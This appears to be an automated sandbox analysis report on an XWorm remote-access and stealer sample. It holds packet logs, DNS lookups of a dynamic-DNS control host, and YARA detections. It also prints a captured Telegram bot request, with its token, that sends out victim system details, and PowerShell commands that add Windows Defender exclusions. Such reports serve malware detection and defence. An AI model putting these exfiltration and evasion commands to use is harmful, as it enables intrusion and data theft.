                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.562381029 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.562424898 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.564584017 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.564702034 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.564745903 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.570261002 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.570327997 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.570384026 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.573956966 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.574129105 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.574178934 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.582413912 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.582542896 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.582593918 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.586162090 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.586224079 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.586272001 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.594383955 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.594476938 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.594526052 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.599561930 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.599776983 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.599822044 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.608088970 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.608171940 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.608218908 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.610451937 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.610567093 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.610611916 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.616467953 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.616528988 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.616584063 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.620078087 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.620167971 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.620207071 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.624876976 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.624993086 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.625145912 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.630325079 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.630419970 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.630470037 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.638257980 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.638377905 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.638431072 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.641665936 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.641720057 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.641778946 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.645499945 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.645674944 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.645730019 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.652757883 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.652940035 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.652980089 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.670604944 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.670618057 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.670670033 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.673758030 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.673856974 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.673898935 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.681816101 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.681910038 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.681957960 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.684231043 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.684355021 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.684396982 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.689671993 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.689770937 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.689816952 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.693850994 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.693934917 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.693983078 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.701913118 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.702034950 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.702085972 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.705677986 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.705780029 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.705821037 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.714232922 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.714308977 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.714359999 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.719201088 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.719309092 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.719744921 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.728209972 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.728266001 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.728328943 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.731544018 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.731822014 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.731864929 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.737180948 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.737273932 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.737323999 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.739710093 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.739861012 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.739950895 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.744410038 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.744498968 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.744558096 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.749757051 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.749891996 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.749938965 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.757709980 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.757802010 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.757852077 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.761178017 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.761286974 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.761337996 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.765204906 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.765296936 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.765341997 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.772296906 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.772416115 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.772533894 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.790008068 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.790064096 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.790136099 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.793334961 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.793468952 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.793509007 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.801378012 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.801450968 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.801506042 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.803767920 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.803879023 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.803927898 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.809092045 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.809171915 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.809221983 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.813376904 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.813476086 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.813550949 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.821330070 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.821436882 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.821506977 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.825133085 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.825236082 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.825340986 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.833812952 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.833894968 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.833947897 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.839039087 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.839165926 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.839222908 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.847585917 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.847719908 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.847768068 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:10:25.851125956 CET70004983778.70.235.238192.168.2.7

                                                                                                                                                                                                                                                      DNS Queries

                                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                      Dec 8, 2024 15:07:16.641513109 CET192.168.2.71.1.1.10x685fStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 8, 2024 15:08:11.593822002 CET192.168.2.71.1.1.10xf4fStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 8, 2024 15:08:13.879030943 CET192.168.2.71.1.1.10xb8a3Standard query (0)f8terat.ddns.netA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                      DNS Answers

                                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                      Dec 8, 2024 15:07:16.782228947 CET1.1.1.1192.168.2.70x685fNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 8, 2024 15:07:40.984997034 CET1.1.1.1192.168.2.70x763aNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 8, 2024 15:07:40.984997034 CET1.1.1.1192.168.2.70x763aNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 8, 2024 15:07:40.984997034 CET1.1.1.1192.168.2.70x763aNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 8, 2024 15:07:40.984997034 CET1.1.1.1192.168.2.70x763aNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 8, 2024 15:07:40.984997034 CET1.1.1.1192.168.2.70x763aNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 8, 2024 15:08:11.735130072 CET1.1.1.1192.168.2.70xf4fNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 8, 2024 15:08:14.017669916 CET1.1.1.1192.168.2.70xb8a3No error (0)f8terat.ddns.net78.70.235.238A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                      HTTP Packets

                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      0192.168.2.749702208.95.112.1804828C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      Dec 8, 2024 15:07:16.919528961 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                                                                                                                                                                                                                      Host: ip-api.com
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Dec 8, 2024 15:07:18.072190046 CET175INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sun, 08 Dec 2024 14:07:17 GMT
                                                                                                                                                                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                      Content-Length: 6
                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                      X-Ttl: 43
                                                                                                                                                                                                                                                      X-Rl: 43
                                                                                                                                                                                                                                                      Data Raw: 66 61 6c 73 65 0a
                                                                                                                                                                                                                                                      Data Ascii: false


                                                                                                                                                                                                                                                      HTTPS Proxied Packets

                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      0192.168.2.749830149.154.167.2204434828C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-12-08 14:08:13 UTC454OUTGET /bot7742194912:AAGSH51C4BpkbbvEQlO-cv-lDoJZMVxqyN4/sendMessage?chat_id=5456205643&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A1BE7C2BE68B9D4CE53EB%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20VPWLLKOO%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20HawkEye%20V1.0 HTTP/1.1
                                                                                                                                                                                                                                                      Host: api.telegram.org
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      2024-12-08 14:08:13 UTC346INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                      Server: nginx/1.18.0
                                                                                                                                                                                                                                                      Date: Sun, 08 Dec 2024 14:08:13 GMT
                                                                                                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                                                                                                      Content-Length: 73
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                                                                                                      2024-12-08 14:08:13 UTC73INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 42 61 64 20 52 65 71 75 65 73 74 3a 20 63 68 61 74 20 6e 6f 74 20 66 6f 75 6e 64 22 7d
                                                                                                                                                                                                                                                      Data Ascii: {"ok":false,"error_code":400,"description":"Bad Request: chat not found"}


                                                                                                                                                                                                                                                      Statistics

                                                                                                                                                                                                                                                      CPU Usage

                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                      Memory Usage

                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                                                                                      Behavior

                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                      System Behavior

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                                                      Start time:09:07:07
                                                                                                                                                                                                                                                      Start date:08/12/2024
                                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\spoolsv.exe"
                                                                                                                                                                                                                                                      Imagebase:0xbc0000
                                                                                                                                                                                                                                                      File size:138'752 bytes
                                                                                                                                                                                                                                                      MD5 hash:FCFAE4FDCC273F8A46C51D49FA8A4A03
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1256711418.0000000000BC2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.1256711418.0000000000BC2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1256711418.0000000000BC2000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_DisableWinDefender, Description: Detects executables containing artifcats associated with disabling Widnows Defender, Source: 00000000.00000002.3715445075.00000000011C0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000000.00000002.3717823961.0000000005400000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.3717823961.0000000005400000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3717823961.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.3717823961.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3717823961.0000000002F24000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:8
                                                                                                                                                                                                                                                      Start time:09:07:17
                                                                                                                                                                                                                                                      Start date:08/12/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\spoolsv.exe'
                                                                                                                                                                                                                                                      Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:9
                                                                                                                                                                                                                                                      Start time:09:07:17
                                                                                                                                                                                                                                                      Start date:08/12/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:10
                                                                                                                                                                                                                                                      Start time:09:07:19
                                                                                                                                                                                                                                                      Start date:08/12/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                                                      Imagebase:0x7ff7fb730000
                                                                                                                                                                                                                                                      File size:496'640 bytes
                                                                                                                                                                                                                                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:11
                                                                                                                                                                                                                                                      Start time:09:07:23
                                                                                                                                                                                                                                                      Start date:08/12/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'spoolsv.exe'
                                                                                                                                                                                                                                                      Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:13
                                                                                                                                                                                                                                                      Start time:09:07:23
                                                                                                                                                                                                                                                      Start date:08/12/2024
